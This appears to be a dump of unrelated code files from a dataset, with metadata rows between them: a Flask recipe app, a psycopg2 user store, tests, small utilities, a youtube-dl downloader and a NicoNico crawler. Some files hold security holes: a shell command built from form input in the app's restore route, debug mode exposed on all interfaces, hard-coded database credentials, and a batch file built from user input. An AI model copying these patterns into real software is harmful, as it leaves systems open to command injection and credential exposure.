res.headers["Content-Type"] = "text/cache-manifest"
return res
@app.route('/admin/restore', methods = ['POST'])
def dorestore():
versionF = os.path.abspath(os.path.join(DBBACKUPPATH, request.form.get('version')))
if os.path.exists(versionF):
now = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
name = '%s_bfrestore.sql'%now
dobackup(name)
tables = queryDbFetchAll('SELECT name FROM sqlite_master WHERE type = "table"')
for tab in tables:
doRawQuery('DROP TABLE %s'%tab['name'])
cmd = 'sqlite3 recipes.db < %s'%versionF
os.system(cmd)
return getstatus()
@app.route('/admin/backup')
def adminbackup():
now = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
dobackup(now+'.sql')
return getstatus()
def dobackup(name):
dbF = open(os.path.join(DBBACKUPPATH, name), 'w')
con = get_db()
dbF.write('\n'.join(con.iterdump()).encode('utf8'))
dbF.close()
@app.route('/admin/status')
def getstatus():
status = {}
status['num_of_recipes'] = queryDbFetchOne('SELECT count(*) as rows FROM recipes')['rows']
status['num_of_fridge'] = queryDbFetchOne('SELECT count(*) as rows FROM fridge')['rows']
status['num_of_ingredients'] = queryDbFetchOne('SELECT count(*) as rows FROM (SELECT DISTINCT ingredient FROM recipeAmount)')['rows']
status['backups'] = sorted(os.listdir(DBBACKUPPATH), reverse=True)
return json.dumps(status, sort_keys=True, indent=4, separators=(',', ': '))
@app.route('/admin')
def adminpage():
values = {'pageId': 'adminPage',
'popupMenuId': 'popupMenuId%d'%randint(1, 1048)
}
return render_template('admin.html', **values)
if __name__ == "__main__":
# import logging
    # file_handler = RotatingFileHandler('/tmp/receptakuten.log', backupCount=5)
# file_handler.setLevel(logging.WARNING)
# app.logger.addHandler(file_handler)
app.run(host="0.0.0.0", debug=True)
# app.run(debug=True)
| 33 | 150 | 0.601373 | 2,018 | 18,348 | 5.418236 | 0.184836 | 0.019023 | 0.025608 | 0.032925 | 0.269984 | 0.225626 | 0.208432 | 0.20386 | 0.19764 | 0.125389 | 0 | 0.00772 | 0.25169 | 18,348 | 555 | 151 | 33.059459 | 0.788638 | 0.023545 | 0 | 0.307359 | 0 | 0.004329 | 0.214245 | 0.005297 | 0 | 0 | 0 | 0.001802 | 0 | 0 | null | null | 0.008658 | 0.02381 | null | null | 0.015152 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
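The query helpers in main.py build SQL by string interpolation (e.g. 'SELECT * FROM recipes WHERE key="%s"' % recipeKey), which is open to SQL injection. A minimal sketch of the parameterized alternative, reusing the app's own get_db() and assuming the same schema:

def get_recipe_safe(recipe_key):
    # sqlite3 binds the value itself, so recipe_key can never alter the SQL structure.
    cur = get_db().cursor()
    cur.execute('SELECT * FROM recipes WHERE key = ?', (recipe_key,))
    return cur.fetchone()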
406a21613d9b1dbc55f543cfe42bc9ef9b68a79c | 1,749 | py | Python | tests/bugs/core_2678_test.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | [
"MIT"
] | 1 | 2022-02-05T11:37:13.000Z | 2022-02-05T11:37:13.000Z | tests/bugs/core_2678_test.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | [
"MIT"
] | 1 | 2021-09-03T11:47:00.000Z | 2021-09-03T12:42:10.000Z | tests/bugs/core_2678_test.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | [
"MIT"
] | 1 | 2021-06-30T14:14:16.000Z | 2021-06-30T14:14:16.000Z | #coding:utf-8
#
# id: bugs.core_2678
# title: Full outer join cannot use available indices (very slow execution)
# description:
# tracker_id: CORE-2678
# min_versions: ['3.0']
# versions: 3.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = []
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
create table td_data1 (
c1 varchar(20) character set win1251 not null collate win1251,
c2 integer not null,
c3 date not null,
d1 float not null
);
create index idx_td_data1 on td_data1(c1,c2,c3);
commit;
create table td_data2 (
c1 varchar(20) character set win1251 not null collate win1251,
c2 integer not null,
c3 date not null,
d2 float not null
);
create index idx_td_data2 on td_data2(c1,c2,c3);
commit;
set planonly;
select
d1.c1, d2.c1,
d1.c2, d2.c2,
d1.c3, d2.c3,
coalesce(sum(d1.d1), 0) t1,
coalesce(sum(d2.d2), 0) t2
from td_data1 d1
full join td_data2 d2
on
d2.c1 = d1.c1
and d2.c2 = d1.c2
and d2.c3 = d1.c3
group by
d1.c1, d2.c1,
d1.c2, d2.c2,
d1.c3, d2.c3;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
PLAN SORT (JOIN (JOIN (D2 NATURAL, D1 INDEX (IDX_TD_DATA1)), JOIN (D1 NATURAL, D2 INDEX (IDX_TD_DATA2))))
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_stdout == act_1.clean_expected_stdout
| 23.958904 | 109 | 0.619211 | 273 | 1,749 | 3.787546 | 0.326007 | 0.054159 | 0.038685 | 0.023211 | 0.255319 | 0.255319 | 0.255319 | 0.201161 | 0.201161 | 0.201161 | 0 | 0.101575 | 0.273871 | 1,749 | 72 | 110 | 24.291667 | 0.712598 | 0.142367 | 0 | 0.326531 | 0 | 0.020408 | 0.677419 | 0 | 0 | 0 | 0 | 0 | 0.020408 | 1 | 0.020408 | false | 0 | 0.040816 | 0 | 0.061224 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
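The test above compares optimizer plans only: `set planonly;` makes isql print the PLAN line without executing the query, so expected_stdout_1 is a single plan string. To run just this test under the firebird-qa harness, an invocation along these lines should work:

pytest tests/bugs/core_2678_test.py -v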
406bff6901669314a484753b5d5e8d18397cb7b2 | 3,693 | py | Python | flask-app/web_app/storage_manager/storage_manager.py | PetrMokrov/back_end_project | 4dd58d61e637d10872fe58a154dc89f6d0829d94 | [
"MIT"
] | null | null | null | flask-app/web_app/storage_manager/storage_manager.py | PetrMokrov/back_end_project | 4dd58d61e637d10872fe58a154dc89f6d0829d94 | [
"MIT"
] | null | null | null | flask-app/web_app/storage_manager/storage_manager.py | PetrMokrov/back_end_project | 4dd58d61e637d10872fe58a154dc89f6d0829d94 | [
"MIT"
] | 1 | 2019-04-02T12:30:13.000Z | 2019-04-02T12:30:13.000Z | #!/usr/bin/env python
import psycopg2
import time
from ..models import User
class StorageManager:
def __init__(self):
self.conn = None
self._connect()
self._create_table()
def _connect(self):
while True:
try:
self.conn = psycopg2.connect(
host='storage',
database='app_storage',
user='admin',
password='admin'
)
except psycopg2.Error:
print('Cannot connect to database, sleeping 3 seconds')
time.sleep(3)
else:
break
def _create_table(self):
while True:
try:
cursor = self.conn.cursor()
cursor.execute('CREATE TABLE IF NOT EXISTS users \
(id SERIAL PRIMARY KEY, login VARCHAR(128), \
email VARCHAR(128), hash_password VARCHAR(132), \
confirmed BOOLEAN)')
except psycopg2.Error:
print('Database error, reconnecting')
self._connect()
else:
break
def insert(self, user):
        '''
        Returns True if the insert succeeded; returns False if a user
        with the same login already exists.
        '''
while True:
try:
if self.select(user.login, category='login') is not None:
return False
cursor = self.conn.cursor()
cursor.execute('INSERT INTO users(login, email, hash_password, confirmed) \
VALUES (%s, %s, %s, %s)', (user.login, user.email, user.hash_password, user.confirmed))
self.conn.commit()
return True
except psycopg2.Error:
print('Database error, reconnecting')
time.sleep(1)
self._connect()
else:
break
def select(self, value, category='login'):
        '''
        Returns None if no user has the given value for `category`;
        otherwise returns a User instance.
        '''
        while True:
            try:
                cursor = self.conn.cursor()
                # NB: category is interpolated into the SQL text, so it must
                # come from trusted code, never from user input.
                cursor.execute('SELECT * FROM users WHERE %s = %%s' % category, (value,))
self.conn.commit()
fetch = cursor.fetchall()
if len(fetch) == 0:
return None
user = User(fetch[0][1], fetch[0][2])
user.id = fetch[0][0]
user.hash_password = fetch[0][3]
user.confirmed = fetch[0][4]
return user
except psycopg2.Error:
print('Database error, reconnecting')
time.sleep(1)
self._connect()
else:
break
def confirm(self, value, category='login'):
        '''
        Sets the 'confirmed' flag to True for the user matching the given
        value of `category`.
        Returns False if no such user is found, True otherwise.
        '''
while True:
try:
if self.select(value, category=category) is not None:
cursor = self.conn.cursor()
cursor.execute('UPDATE users SET confirmed = TRUE WHERE %s = %%s' % category, (value,))
self.conn.commit()
return True
else:
return False
except psycopg2.Error:
print('Database error, reconnecting')
time.sleep(1)
self._connect()
else:
break
| 33.572727 | 107 | 0.479285 | 360 | 3,693 | 4.863889 | 0.272222 | 0.041119 | 0.034266 | 0.068532 | 0.423187 | 0.390634 | 0.256996 | 0.229012 | 0.190177 | 0.138778 | 0 | 0.015195 | 0.429732 | 3,693 | 109 | 108 | 33.880734 | 0.816239 | 0.093149 | 0 | 0.563218 | 0 | 0 | 0.087238 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0.057471 | 0.034483 | 0 | 0.183908 | 0.057471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
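A usage sketch for the class above. `User(login, email)` mirrors how select() reconstructs users; setting hash_password directly and the hash value itself are assumptions about the User model:

sm = StorageManager()
user = User('alice', 'alice@example.com')
user.hash_password = 'pbkdf2:...'        # hypothetical hash value
if sm.insert(user):                      # False if the login already exists
    sm.confirm('alice', category='login')
print(sm.select('alice').confirmed)      # -> True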
407208de4a5ad6967ea27d59e0496b7b2dfa6fe5 | 747 | py | Python | meiduo_mall/meiduo_mall/apps/meiduo_admin/views/spus.py | aGrass0825/meiduo_project | 78c560c1e9a3205d4958ddbe798cd0ab2be41830 | [
"MIT"
] | null | null | null | meiduo_mall/meiduo_mall/apps/meiduo_admin/views/spus.py | aGrass0825/meiduo_project | 78c560c1e9a3205d4958ddbe798cd0ab2be41830 | [
"MIT"
] | null | null | null | meiduo_mall/meiduo_mall/apps/meiduo_admin/views/spus.py | aGrass0825/meiduo_project | 78c560c1e9a3205d4958ddbe798cd0ab2be41830 | [
"MIT"
] | null | null | null | from rest_framework.generics import ListAPIView
from rest_framework.permissions import IsAdminUser
from goods.models import SPU, SPUSpecification
from meiduo_admin.serializers.spus import SPUSimpleSerializer, SPUSpecSerializer
class SPUSimpleView(ListAPIView):
permission_classes = [IsAdminUser]
queryset = SPU.objects.all()
serializer_class = SPUSimpleSerializer
# GET /meiduo_admin/goods/(?P<pk>\d+)/specs/
class SPUSpecView(ListAPIView):
    """Fetch the specification options data for an SPU product."""
    permission_classes = [IsAdminUser]

    # Queryset used by this view class
    def get_queryset(self):
        pk = self.kwargs['pk']
        specs = SPUSpecification.objects.filter(spu_id=pk)
        return specs

    # Serializer class used by this view class
    serializer_class = SPUSpecSerializer
| 24.096774 | 80 | 0.749665 | 76 | 747 | 7.236842 | 0.539474 | 0.029091 | 0.061818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.167336 | 747 | 30 | 81 | 24.9 | 0.884244 | 0.113788 | 0 | 0.133333 | 0 | 0 | 0.003072 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.266667 | 0 | 0.866667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
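A sketch of how the two views might be wired into the admin URL conf; the route patterns are assumptions based on the GET comment above:

from django.conf.urls import url
from meiduo_admin.views import spus

urlpatterns = [
    url(r'^goods/simple/$', spus.SPUSimpleView.as_view()),
    url(r'^goods/(?P<pk>\d+)/specs/$', spus.SPUSpecView.as_view()),
]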
40771f48cc35e55bf1ed0377d840f200b12f6982 | 739 | py | Python | Use.py | XtremeCoder1384/SongDownloader | 7bb06d7961ec699af8517cbd7cb4a1ec83d4fd02 | [
"MIT"
] | 1 | 2019-03-04T02:26:41.000Z | 2019-03-04T02:26:41.000Z | Use.py | XtremeCoder1384/SongDownloader | 7bb06d7961ec699af8517cbd7cb4a1ec83d4fd02 | [
"MIT"
] | 1 | 2018-12-20T02:32:35.000Z | 2019-03-11T12:51:15.000Z | Use.py | IngeniousCoder/SongDownloader | 7bb06d7961ec699af8517cbd7cb4a1ec83d4fd02 | [
"MIT"
] | null | null | null | import os
import youtube_dl
os.system("setup.bat")
playlist = input("Paste the Youtube Playlist URL Here.")
track = 1
print("""THIS TOOL WILL ATTEMPT TO DOWNLOAD THE FIRST 1000 SONGS IN THE QUEUE.\n
PLEASE DO NOT INTERRUPT THE TOOL.
YOU MAY CLOSE THE TOOL WHEN IT DISPLAYS "DONE!".
ALL DOWNLOADED SONGS WILL BE IN THE SAME DIRECTORY THIS FILE IS IN.
TO EXTRACT THEM, FILTER BY MP3.""")
for x in range(1000):
    # Write one batch file per track and close it before executing it.
    with open("Downloader.bat", "w") as file:
        file.write("youtube-dl -x --playlist-start {} --audio-format mp3 --playlist-end {} {}".format(track, track, playlist))
    os.system("Downloader.bat")
    track = track + 1
print("DONE! You may now close this window.")
| 36.95 | 129 | 0.663058 | 113 | 739 | 4.327434 | 0.575221 | 0.03681 | 0.04499 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020725 | 0.216509 | 739 | 19 | 130 | 38.894737 | 0.823834 | 0 | 0 | 0 | 0 | 0.058824 | 0.656944 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.117647 | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
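Since the script already imports youtube_dl, the same per-track download could go through its Python API instead of generated batch files; a sketch using documented option keys (playliststart/playlistend and the FFmpegExtractAudio postprocessor):

import youtube_dl

def download_track(playlist_url, track):
    opts = {
        'format': 'bestaudio/best',
        'playliststart': track,   # download only this position in the playlist
        'playlistend': track,
        'postprocessors': [{
            'key': 'FFmpegExtractAudio',
            'preferredcodec': 'mp3',
        }],
    }
    with youtube_dl.YoutubeDL(opts) as ydl:
        ydl.download([playlist_url])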
407a65f9c4b9f958fde5ab42bad4bdd15788bb31 | 4,046 | py | Python | tests/test_classification_metric.py | DaveFClarke/ml_bias_checking | 90f67ebc602b6107042e6cbff3268051bb3b1c95 | [
"Apache-2.0"
] | 2 | 2021-07-31T20:52:37.000Z | 2022-02-15T21:05:17.000Z | tests/test_classification_metric.py | DaveFClarke/ml_bias_checking | 90f67ebc602b6107042e6cbff3268051bb3b1c95 | [
"Apache-2.0"
] | 2 | 2021-08-25T16:16:43.000Z | 2022-02-10T05:26:14.000Z | tests/test_classification_metric.py | DaveFClarke/ml_bias_checking | 90f67ebc602b6107042e6cbff3268051bb3b1c95 | [
"Apache-2.0"
] | 1 | 2019-05-21T15:31:24.000Z | 2019-05-21T15:31:24.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import pandas as pd
from aif360.datasets import BinaryLabelDataset
from aif360.metrics import ClassificationMetric
def test_generalized_entropy_index():
data = np.array([[0, 1],
[0, 0],
[1, 0],
[1, 1],
[1, 0],
[1, 0],
[2, 1],
[2, 0],
[2, 1],
[2, 1]])
pred = data.copy()
pred[[3, 9], -1] = 0
pred[[4, 5], -1] = 1
df = pd.DataFrame(data, columns=['feat', 'label'])
df2 = pd.DataFrame(pred, columns=['feat', 'label'])
bld = BinaryLabelDataset(df=df, label_names=['label'],
protected_attribute_names=['feat'])
bld2 = BinaryLabelDataset(df=df2, label_names=['label'],
protected_attribute_names=['feat'])
cm = ClassificationMetric(bld, bld2)
assert cm.generalized_entropy_index() == 0.2
pred = data.copy()
pred[:, -1] = np.array([0, 1, 1, 0, 0, 0, 0, 1, 1, 1])
df2 = pd.DataFrame(pred, columns=['feat', 'label'])
bld2 = BinaryLabelDataset(df=df2, label_names=['label'],
protected_attribute_names=['feat'])
cm = ClassificationMetric(bld, bld2)
assert cm.generalized_entropy_index() == 0.3
def test_theil_index():
data = np.array([[0, 1],
[0, 0],
[1, 0],
[1, 1],
[1, 0],
[1, 0],
[2, 1],
[2, 0],
[2, 1],
[2, 1]])
pred = data.copy()
pred[[3, 9], -1] = 0
pred[[4, 5], -1] = 1
df = pd.DataFrame(data, columns=['feat', 'label'])
df2 = pd.DataFrame(pred, columns=['feat', 'label'])
bld = BinaryLabelDataset(df=df, label_names=['label'],
protected_attribute_names=['feat'])
bld2 = BinaryLabelDataset(df=df2, label_names=['label'],
protected_attribute_names=['feat'])
cm = ClassificationMetric(bld, bld2)
assert cm.theil_index() == 4*np.log(2)/10
def test_between_all_groups():
data = np.array([[0, 1],
[0, 0],
[1, 0],
[1, 1],
[1, 0],
[1, 0],
[2, 1],
[2, 0],
[2, 1],
[2, 1]])
pred = data.copy()
pred[[3, 9], -1] = 0
pred[[4, 5], -1] = 1
df = pd.DataFrame(data, columns=['feat', 'label'])
df2 = pd.DataFrame(pred, columns=['feat', 'label'])
bld = BinaryLabelDataset(df=df, label_names=['label'],
protected_attribute_names=['feat'])
bld2 = BinaryLabelDataset(df=df2, label_names=['label'],
protected_attribute_names=['feat'])
cm = ClassificationMetric(bld, bld2)
b = np.array([1, 1, 1.25, 1.25, 1.25, 1.25, 0.75, 0.75, 0.75, 0.75])
assert cm.between_all_groups_generalized_entropy_index() == 1/20*np.sum(b**2 - 1)
def test_between_group():
data = np.array([[0, 0, 1],
[0, 1, 0],
[1, 1, 0],
[1, 1, 1],
[1, 0, 0],
[1, 0, 0]])
pred = data.copy()
pred[[0, 3], -1] = 0
pred[[4, 5], -1] = 1
df = pd.DataFrame(data, columns=['feat', 'feat2', 'label'])
df2 = pd.DataFrame(pred, columns=['feat', 'feat2', 'label'])
bld = BinaryLabelDataset(df=df, label_names=['label'],
protected_attribute_names=['feat', 'feat2'])
bld2 = BinaryLabelDataset(df=df2, label_names=['label'],
protected_attribute_names=['feat', 'feat2'])
cm = ClassificationMetric(bld, bld2, unprivileged_groups=[{'feat': 0}],
privileged_groups=[{'feat': 1}])
b = np.array([0.5, 0.5, 1.25, 1.25, 1.25, 1.25])
assert cm.between_group_generalized_entropy_index() == 1/12*np.sum(b**2 - 1)
| 34.87931 | 85 | 0.505685 | 496 | 4,046 | 3.979839 | 0.129032 | 0.02229 | 0.018237 | 0.109422 | 0.698582 | 0.681864 | 0.675785 | 0.641337 | 0.624113 | 0.624113 | 0 | 0.077936 | 0.324518 | 4,046 | 115 | 86 | 35.182609 | 0.644347 | 0 | 0 | 0.696078 | 0 | 0 | 0.04696 | 0 | 0 | 0 | 0 | 0 | 0.04902 | 1 | 0.039216 | false | 0 | 0.078431 | 0 | 0.117647 | 0.009804 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
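For reference, the quantity these tests assert is the generalized entropy index with alpha=2 over per-individual benefits b_i = y_hat_i - y_i + 1 (aif360's definition); a standalone sketch of the formula, which reduces to the 1/20 * sum(b**2 - 1) expressions above when the benefit mean is 1:

import numpy as np

def generalized_entropy_index(b, alpha=2):
    # GE(alpha) = 1 / (n * alpha * (alpha - 1)) * sum((b_i / mu)**alpha - 1)
    mu = b.mean()
    return np.mean((b / mu) ** alpha - 1) / (alpha * (alpha - 1))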
40804fd1f1dd57a07519de8f44b10f0b6f6d1a54 | 274 | py | Python | platonic/platonic/box/implementation.py | anatoly-scherbakov/platonic | b2d239e19f3ebf5a562b6aabcd4b82492bb03564 | [
"MIT"
] | 1 | 2019-11-01T09:08:50.000Z | 2019-11-01T09:08:50.000Z | platonic/platonic/box/implementation.py | anatoly-scherbakov/platonic | b2d239e19f3ebf5a562b6aabcd4b82492bb03564 | [
"MIT"
] | null | null | null | platonic/platonic/box/implementation.py | anatoly-scherbakov/platonic | b2d239e19f3ebf5a562b6aabcd4b82492bb03564 | [
"MIT"
] | null | null | null | from typing import TypeVar
from .abstract import AbstractBox
T = TypeVar('T')
class ValueBox(AbstractBox[T]):
_value: T
@property
def value(self) -> T:
return self._value
@value.setter
def value(self, value: T):
self._value = value
| 15.222222 | 33 | 0.635036 | 35 | 274 | 4.885714 | 0.428571 | 0.157895 | 0.140351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.262774 | 274 | 17 | 34 | 16.117647 | 0.846535 | 0 | 0 | 0 | 0 | 0 | 0.00365 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0.090909 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
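A minimal usage sketch, assuming AbstractBox declares `value` as its abstract interface so that ValueBox is instantiable:

box: ValueBox[int] = ValueBox()
box.value = 42
assert box.value == 42
# Note: reading .value before the first assignment raises AttributeError,
# since _value is only ever set by the setter.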
40826ce560682ad3ad560f8fecc12e0ab6658bc0 | 767 | py | Python | 39. Combination Sum.py | MapleLove2014/leetcode | 135c79ebe98815d0e38280edfadaba90e677aff5 | [
"Apache-2.0"
] | 1 | 2020-12-04T07:38:16.000Z | 2020-12-04T07:38:16.000Z | 39. Combination Sum.py | MapleLove2014/leetcode | 135c79ebe98815d0e38280edfadaba90e677aff5 | [
"Apache-2.0"
] | null | null | null | 39. Combination Sum.py | MapleLove2014/leetcode | 135c79ebe98815d0e38280edfadaba90e677aff5 | [
"Apache-2.0"
] | null | null | null | class Solution:
def combinationSum(self, candidates, target):
def lookup(candidates, index, target, combine, result):
if target == 0:
result.append(combine)
return
if index >= len(candidates) and target > 0:
return
if target >= candidates[index]:
lookup(candidates, index, target - candidates[index], list(combine) + [candidates[index]], result)
lookup(candidates, index + 1, target, list(combine), result)
sorted(candidates)
result = []
lookup(candidates, 0, target, [], result)
return result
s = Solution()
print(s.combinationSum([2,3,6,7], 7))
print(s.combinationSum([2,3,5], 8))
| 34.863636 | 114 | 0.555411 | 79 | 767 | 5.392405 | 0.35443 | 0.211268 | 0.147887 | 0.126761 | 0.103286 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025097 | 0.324641 | 767 | 21 | 115 | 36.52381 | 0.797297 | 0 | 0 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
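At each index the recursion explores two branches: keep candidates[index] (staying at the same index, so a value can repeat) or skip to index + 1; a combination is recorded whenever target reaches exactly 0. In depth-first order, the two calls above yield [[2, 2, 3], [7]] and [[2, 2, 2, 2], [2, 3, 3], [3, 5]].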
4082bcb5f99112c93d2d504f08622c615955a33b | 1,204 | py | Python | crawl_comments.py | tosh1ki/NicoCrawler | 236029f103e01de9e61a042759dc9bf2cb7d3d55 | [
"MIT"
] | 1 | 2015-03-04T14:06:33.000Z | 2015-03-04T14:06:33.000Z | crawl_comments.py | tosh1ki/NicoCrawler | 236029f103e01de9e61a042759dc9bf2cb7d3d55 | [
"MIT"
] | 2 | 2015-03-04T02:48:18.000Z | 2015-03-04T14:18:32.000Z | crawl_comments.py | tosh1ki/NicoCrawler | 236029f103e01de9e61a042759dc9bf2cb7d3d55 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__doc__ = '''
Crawl comment from nicovideo.jp
Usage:
crawl_comments.py --url <url> --mail <mail> --pass <pass> [--sqlite <sqlite>] [--csv <csv>]
Options:
--url <url>
--mail <mail>
--pass <pass>
--sqlite <sqlite> (optional) path of comment DB [default: comments.sqlite3]
--csv <csv> (optional) path of csv file contains urls of videos [default: crawled.csv]
'''
from docopt import docopt
from nicocrawler.nicocrawler import NicoCrawler
if __name__ == '__main__':
    # Parse command-line arguments
args = docopt(__doc__)
url_channel_toppage = args['--url']
login_mail = args['--mail']
login_pass = args['--pass']
path_sqlite = args['--sqlite']
path_csv = args['--csv']
ncrawler = NicoCrawler(login_mail, login_pass)
ncrawler.connect_sqlite(path_sqlite)
df = ncrawler.get_all_video_url_of_season(url_channel_toppage)
ncrawler.initialize_csv_from_db(path_csv)
    # # Fetch the videos ranked 1-300 in the daily ranking
# url = 'http://www.nicovideo.jp/ranking/fav/daily/all'
# ncrawler.initialize_csv_from_url(url, path_csv, max_page=3)
# ncrawler.get_all_comments_of_csv(path_csv, max_n_iter=1)
| 26.173913 | 102 | 0.671096 | 158 | 1,204 | 4.797468 | 0.411392 | 0.036939 | 0.026385 | 0.036939 | 0.08971 | 0.08971 | 0.08971 | 0.08971 | 0 | 0 | 0 | 0.008188 | 0.188538 | 1,204 | 45 | 103 | 26.755556 | 0.767656 | 0.208472 | 0 | 0 | 0 | 0.083333 | 0.450794 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.166667 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
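An invocation sketch matching the docopt usage string above; the channel URL and credentials are placeholders:

python crawl_comments.py --url http://ch.nicovideo.jp/example-channel --mail user@example.com --pass secret --sqlite comments.sqlite3 --csv crawled.csv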